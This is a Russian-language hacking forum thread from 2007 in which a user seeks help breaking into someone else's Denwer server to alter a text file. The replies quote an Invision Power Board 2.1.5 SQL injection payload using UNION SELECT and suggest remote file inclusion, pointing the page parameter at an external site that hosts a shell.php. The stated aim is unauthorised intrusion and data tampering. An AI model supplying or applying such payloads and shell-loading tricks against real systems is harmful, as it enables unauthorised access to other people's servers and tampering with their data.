[Взлом] denwer
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
[Взлом] denwer - 2007-01-01 12:19:11.093333
|
|
|
[Random]
Сообщений: 6
Оценки: 0
Присоединился: 2007-01-01 12:05:29.270000
|
Добрый день!
Такая проблема, нужно взломать комп, на котором стоит денвер, и на нём парочка сайтов. Сайты до ужоса простые, на пхп. Все на одном движке, index.php?page=my_page
Как мне удалось выяснить, там просто инклудятся скрипты my_page.php, но заинклудить что-нибудь левое не удаётся, значит там просто стоит switch($page) …
Итак, что известно:
1. На компе стоит денвер (вылетает денверовская ошибка, если запрашиваем несуществуюший скрипт)
2. при запросе index.php?page=gallery вылетает ошибка:
quote:
Warning: main(gallery.php): failed to open stream: No such file or directory in z:\home\192.168.67.121\www\wart\index.php on line 77
Warning: main(): Failed opening 'gallery.php' for inclusion (include_path='.;/usr/local/php/PEAR') in z:\home\192.168.67.121\www\wart\index.php on line 77
3. Нашёл директорию с картинками без index.html (но видимо это не поможет)
4. Кроме того, на серваке стоит MKPortal M1.1 Rc1, пробовал всякие его уязвимости юзать, но ничего не помогло, видимо версия последняя
5. Стоит также Invision Power Board v2.1.5 (чё с ним делать не знаю)
Цель взлома: получить доступ к текстовому файлику, который ещё хз где лежит, но его расположение можно узнать из скрипта index.php, и удалить в этом файлике одну строчку =)
|
|
|
|
|
RE: [Взлом] denwer - 2007-01-01 13:38:48.010000
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
http://www.securitylab.ru/search/index.php?q=Invision+Power+Board+2.1.5&where=iblock_vulnerability
|
|
|
|
|
RE: [Взлом] denwer - 2007-01-01 14:39:45.886666
|
|
|
[Random]
Сообщений: 6
Оценки: 0
Присоединился: 2007-01-01 12:05:29.270000
|
Как поюзать-то данную уязвимость?
quote:
Уязвимость существует из-за недостаточной обработки входных данных в параметре "selectedtids" в функции post_delete() сценария func_mod.php при удалении нескольких тем в форуме. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1)
UNION SELECT 1,3/*&tact=delete
там у них буквы разные, как правильно-то? попробовал и то, и другое - ИПБ говорит "некорректный запрос"
|
|
|
|
|
RE: [Взлом] denwer - 2007-01-04 19:57:58.350000
|
|
|
[Random]
Сообщений: 6
Оценки: 0
Присоединился: 2007-01-01 12:05:29.270000
|
перенесите чтоли в другой раздел, мож там кто поможет…
|
|
|
|
|
RE: [Взлом] denwer - 2007-01-04 20:33:30.360000
|
|
|
netfox
Сообщений: 28
Оценки: 0
Присоединился: 2006-11-28 10:14:12.606666
|
пощупай на предмет виндовых баг, насколько понимаю сервер в локалке:?
|
|
|
|
|
RE: [Взлом] denwer - 2007-01-04 20:48:00.433333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
епт! какой switch, если тебе пишется ошибка инклюда! попробуй вместо page=gallery писать page=http://www.ТВОЙСАЙТ.narod.ru/shell
(предварительно нужно загрузить на ТВОЙСАЙТ файл shell.php)
|
|
|
|
|
RE: [Взлом] denwer - 2007-01-17 19:08:11.236666
|
|
|
[Random]
Сообщений: 6
Оценки: 0
Присоединился: 2007-01-01 12:05:29.270000
|
quote:
ORIGINAL: netfox
пощупай на предмет виндовых баг, насколько понимаю сервер в локалке:?
Если б я умел…
quote:
епт! какой switch, если тебе пишется ошибка инклюда! попробуй вместо page=gallery писать page=http://www.ТВОЙСАЙТ.narod.ru/shell
(предварительно нужно загрузить на ТВОЙСАЙТ файл shell.php)
Не получается, там точно switch, просто файла того не было. Сейчас появился
|
|
|
|
|
|
